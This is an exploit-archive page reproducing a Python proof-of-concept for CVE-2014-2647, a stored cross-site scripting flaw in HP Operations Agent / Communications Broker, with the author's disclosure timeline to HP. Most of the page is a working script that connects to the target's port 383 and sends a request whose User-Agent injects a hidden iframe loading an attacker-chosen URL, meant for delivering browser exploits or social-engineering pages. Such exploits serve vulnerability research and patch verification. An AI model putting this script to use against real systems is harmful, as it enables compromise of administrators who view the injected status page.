首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Operations Agent Remote XSS iFrame Injection
来源:Syph0n 作者:Schmidt 发布时间:2014-10-28  
#!/usr/bin/python
# Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection
# Date: 10/16/2014
# Exploit Author: Matt Schmidt (Syph0n)
# Vendor Homepage: www.hp.com
# Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14
# Tested on: Windows 7, SunOS, RHEL Linux
# CVE : CVE-2014-2647
#
# This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent.
# This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent.
# Vulnerable page: /Hewlett-Packard/OpenView/BBC/status
# This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded.
#
# Vulnerability Discovered by: Matt Schmidt (Syph0n)
# Timeline:
#   07/07/2014 - Submitted Discovery to ZDI
#   07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT.
#   07/12/2014 - Contacted HP SSRT
#   07/13/2014 - HP SSRT assigned Case SSRT101643
#   07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT
#   07/30/2014 - Followed up with HP
#   07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission
#   08/13/2014 - Followed up with HP
#   08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14
#   08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date
#   08/31/2014 - Followed up with HP again as no response to previous email
#   09/04/2014 - Followed up with HP again as no response to previous two emails
#   09/14/2014 - Followed up with HP again as no response to previous three emails
#   09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue"
#   10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier
#   10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th.
#   10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444
#   10/15/2014 - CVE-2014-2647 Issued for this vulnerability
  
import argparse, socket, sys
  
  
# Define Help Menu
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
    print '\nUsage: ./exploit.py <TargetIP> <iFrame URL> [Port]\n'
    print '    <TargetIP>: The Target IP Address'
    print '    <iFrame URL>: Malicious URL that will be injected as a hidden iframe\n'
    print 'Options:'
    print '  [--port]: The port the HP Communications Broker is running on, default is 383'
    sys.exit(1)
  
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("TargetIP")
parser.add_argument("iFrameURL")
parser.add_argument("--port", type=int, default=383)
args = parser.parse_args()
  
# Define User Agent to be spoofed
agent = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'
  
  
# Define Variables
host = args.TargetIP
port = args.port
iFrameURL = args.iFrameURL
  
def main():
    # Malicious hidden iframe payload that takes input from args.iFrameURL and fake UserAgent from agent_list
    payload = "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\nUser-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"+iFrameURL+"'></iframe><a>"+ agent +"</a>\r\n\r\n"
  
    # Create Socket and check connection to target.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[*] Checking host: " +host+"\n"
    try:
        s.connect((host, int(port)))
    except Exception as e:
        print "[+] Error Connecting: ", e
        exit()
    print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n"
      
    # Keep connection alive
    while payload != 'q':
        s.send(payload.encode())
          
        data = s.recv(1024)
        print "[*] Payload Sent."
                  
        payload = raw_input("\n[+] Keeping Connection Open ([q]uit):")
    return
  
if __name__ == '__main__':
    main()




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Creative Contact Form (Wordpre
·Incredible PBX 2.0.6.5.0 - Rem
·Windows OLE - Remote Code Exec
·vBulletin 4.x Tapatalk Blind S
·Centreon SQL / Command Injecti
·Windows TrackPopupMenu Win32k
·OpenBSD 5.5 Local Kernel Panic
·云端博弈——云安全入侵取证及思
·WordPress / Joomla Creative Co
·vBulletin Tapatalk - Blind SQL
·Free WMA MP3 Converter 1.8 Buf
·CUPS Filter Bash Environment V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved